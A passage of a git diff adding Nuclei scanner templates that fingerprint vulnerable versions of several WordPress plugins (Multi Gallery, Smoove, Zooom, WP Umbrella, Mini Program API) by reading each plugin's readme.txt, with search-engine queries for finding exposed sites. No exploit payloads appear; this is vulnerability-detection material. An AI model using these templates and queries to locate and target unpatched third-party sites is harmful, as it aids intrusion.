matchers: + - type: status + status: + - 200 + + - type: word + words: + - "library-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0') \ No newline at end of file diff --git a/poc/other/multi-gallery.yaml b/poc/other/multi-gallery.yaml new file mode 100644 index 0000000000..849dfa27c8 --- /dev/null +++ b/poc/other/multi-gallery.yaml @@ -0,0 +1,59 @@ +id: multi-gallery + +info: + name: > + Gallery <= 1.3 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/778f7d9b-6376-4026-a291-1fedeabe8c99?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/multi-gallery/" + google-query: inurl:"/wp-content/plugins/multi-gallery/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,multi-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/multi-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "multi-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/smoove-elementor.yaml b/poc/other/smoove-elementor.yaml new file mode 100644 index 0000000000..93015c9446 --- /dev/null +++ b/poc/other/smoove-elementor.yaml @@ -0,0 +1,59 @@ +id: smoove-elementor + +info: + name: > + Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smoove-elementor/" + google-query: inurl:"/wp-content/plugins/smoove-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smoove-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smoove-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/other/swift_performance_lite.yaml b/poc/other/swift_performance_lite.yaml new file mode 100644 index 0000000000..5ee61da7bf --- /dev/null +++ b/poc/other/swift_performance_lite.yaml @@ -0,0 +1,20 @@ +id: swift_performance_lite +info: + name: swift_performance_lite + author: cn-kali-team + tags: detect,tech,swift_performance_lite + severity: info + metadata: + fofa-query: + - body="/wp-content/plugins/swift-performance-lite" + product: swift_performance_lite + vendor: swiftperformance + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - /wp-content/plugins/swift-performance-lite diff --git a/poc/other/zooom.yaml b/poc/other/zooom.yaml new file mode 100644 index 0000000000..f10c38a319 --- /dev/null +++ b/poc/other/zooom.yaml @@ -0,0 +1,59 @@ +id: zooom + +info: + name: > + Zooom <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd15878-a290-4613-83d9-011d60bb0233?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zooom/" + google-query: inurl:"/wp-content/plugins/zooom/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zooom,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zooom/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zooom" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml b/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml new file mode 100644 index 0000000000..52fc1e4f8c --- /dev/null +++ b/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml @@ -0,0 +1,59 @@ +id: wp-health-13e7f9c38c97fef1a7e5dbdde401c273 + +info: + name: > + WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-health/" + google-query: inurl:"/wp-content/plugins/wp-health/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-health,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-health" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.17.0') \ No newline at end of file diff --git a/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml b/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml new file mode 100644 index 0000000000..52fc1e4f8c --- /dev/null +++ b/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml @@ -0,0 +1,59 @@ +id: wp-health-13e7f9c38c97fef1a7e5dbdde401c273 + +info: + name: > + WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-health/" + google-query: inurl:"/wp-content/plugins/wp-health/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-health,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-health" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.17.0') \ No newline at end of file diff --git a/poc/wordpress/wp-mini-program.yaml b/poc/wordpress/wp-mini-program.yaml new file mode 100644 index 0000000000..c987d75909 --- /dev/null +++ b/poc/wordpress/wp-mini-program.yaml @@ -0,0 +1,59 @@ +id: wp-mini-program + +info: + name: > + Mini Program API <= 1.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0b9499b-3017-46a6-80d5-104d203b77f0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-mini-program/" + google-query: inurl:"/wp-content/plugins/wp-mini-program/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-mini-program,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mini-program/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mini-program" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.5') \ No newline at end of file